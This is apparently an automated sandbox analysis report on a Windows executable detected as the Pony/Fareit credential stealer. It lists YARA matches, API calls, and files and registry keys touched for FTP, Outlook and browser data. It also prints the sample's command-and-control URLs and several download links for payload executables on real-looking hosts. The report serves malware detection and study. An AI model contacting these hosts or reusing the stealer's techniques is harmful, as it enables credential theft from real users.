HTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)

Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://67.158.38.155/jiKEb8.exe
Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://aasthakitchen.com/vMTXwWg.exe
Source: pbfe2Xcxue.exe, pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ftp.pexgol.com/bm6dog.exe
Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://https://ftp://operawand.dat_Software
Source: pbfe2Xcxue.exe, pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://oliviagurun.com/forum/viewtopic.php
Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://oliviagurun.com/forum/viewtopic.phphttp://onecable.ca/forum/viewtopic.phphttp://onlyidea.com/
Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://onecable.ca/forum/viewtopic.php
Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://onecable.ca/forum/viewtopic.php$Z
Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://onecable.ca/forum/viewtopic.phpH
Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://onlyidea.com/forum/viewtopic.php
Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://originalpizzaplus.ca/forum/viewtopic.php
Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.ue-electronics.de/XjwiYdic.exe
Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: pbfe2Xcxue.exe, 00000000.00000003.2023274882.0000000000562000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.co
Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected Pony

Source: Yara match	File source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: Fareit Payload Author: kevoreilly
Source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Fareit Payload Author: kevoreilly
Source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Fareit Payload Author: kevoreilly
Source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Fareit Payload Author: kevoreilly
Source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Code function: 0_2_00402EE2 CreateProcessAsUserA,ShellExecuteA,

0_2_00402EE2

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_0041256A		0_2_0041256A
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_004039CE		0_2_004039CE

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: String function: 00410B9E appears 42 times
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: String function: 00401DAD appears 139 times
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: String function: 004045D1 appears 51 times

Source: pbfe2Xcxue.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@12/1

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Code function: 0_2_0040D67C CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,

0_2_0040D67C

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Code function: 0_2_004029B5 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,

0_2_004029B5

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Code function: 0_2_00402D3E WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,

0_2_00402D3E

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Code function: 0_2_0040AB37 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,

0_2_0040AB37

Source: pbfe2Xcxue.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE server_card_cloud_token_data (id VARCHAR, suffix VARCHAR, exp_month INTEGER DEFAULT 0, exp_year INTEGER DEFAULT 0, card_art_url VARCHAR, instrument_token VARCHAR) ;
Source: pbfe2Xcxue.exe, 00000000.00000003.1720426996.0000000000575000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: pbfe2Xcxue.exe	ReversingLabs: Detection: 95%
Source: pbfe2Xcxue.exe	Virustotal: Detection: 75%

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

File read: C:\Users\user\Desktop\pbfe2Xcxue.exe

Jump to behavior

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: untfs.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source: pbfe2Xcxue.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: pbfe2Xcxue.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Unpacked PE file: 0.2.pbfe2Xcxue.exe.400000.0.unpack .text:ER;.data:W;.RData:R;.Adata:R; vs .text:ER;.rdata:R;.data:W;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Unpacked PE file: 0.2.pbfe2Xcxue.exe.400000.0.unpack

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Code function: 0_2_00402514 LoadLibraryA,GetProcAddress,

0_2_00402514

Source: pbfe2Xcxue.exe

Static PE information: section name: .Adata

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_004E0626 push 00000000h; ret		0_2_004E062B
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_004F0616 push 00000000h; ret		0_2_004F061B

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe TID: 7432

Thread sleep time: -70000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_00405478 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	0_2_00405478
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_00404426 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_00404426
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_00405108 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_00405108
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_00408DAD FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_00408DAD
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_00408C29 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_00408C29
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	Code function: 0_2_00409AF6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_00409AF6

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

Code function: 0_2_0040487D GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_0040487D

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\pbfe2Xcxue.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\pbfe2Xcxue.exe

API call chain: ExitProcess graph end node

graph_0-11736

